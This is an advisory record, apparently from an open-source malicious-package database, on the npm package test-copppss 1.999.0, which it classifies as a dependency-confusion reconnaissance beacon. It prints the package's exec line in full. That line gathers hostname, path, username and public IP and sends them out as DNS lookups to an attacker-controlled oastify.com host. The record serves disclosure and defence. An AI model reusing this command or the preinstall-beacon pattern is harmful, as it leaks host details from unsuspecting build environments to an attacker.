-= Per source details. Do not edit below this line.=-
On npm install, the package's preinstall hook (node index.js > /dev/null 2>&1) runs a shell pipeline that collects host identifiers — hostname, pwd, whoami, the package name test-copppss, and the machine's public IP via curl https://ifconfig.me — hex-encodes the concatenation with xxd -p, and exfiltrates it as DNS subdomain lookups to *.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com (a Burp Collaborator OAST endpoint controlled by the operator). Code at index.js:2 is exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done"). The package metadata (empty description, near-max version 1.999.0 to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape — the attacker is probing which internal build systems resolve test-copppss to this public name and is harvesting the host fingerprint of any environment that does.
{
"malicious-packages-origins": [
{
"versions": [
"1.999.0"
],
"sha256": "03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe",
"import_time": "2026-06-16T21:06:47.486296869Z",
"modified_time": "2026-06-16T20:01:12Z",
"id": "IN-MAL-2026-006832",
"source": "amazon-inspector"
}
]
}[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"package_integrity": [
{
"filename": "test-copppss-1.999.0.tgz",
"hashes": {
"sha1": "29bad4751233c7c0ee7d1310d4366f4b4faf445e",
"sha512_sri": "sha512-z2EvjEhn7DfCm9tJR066inupnlGR1YOUo0hCWAO0P9WATEs9yERdTehtmD25RKHUQnFRaMUSY4JGN5V8a3fxrw=="
}
}
],
"evidence_files": [
{
"tlsh": "5ae0f1d0f6aa9b3273e110419c051017b4c3beab1c72dc02164cc53d22c0e86a0b45d6",
"sha256": "593ec91dfcc3dd5894e18beef9c0cbb072c8f19d544cabf24784cd1a790bc437",
"path": "index.js"
},
{
"tlsh": "90e07d345e216f3332c801911c1a5003a3a1cf1f0018bd0973cb051c408e677acfe31d",
"sha256": "24d4d768dc9a64ff9fcfd88cb655576adf4ca3b9e888b38b5324ca46acc7e531",
"path": "package.json"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-copppss/MAL-2026-5926.json"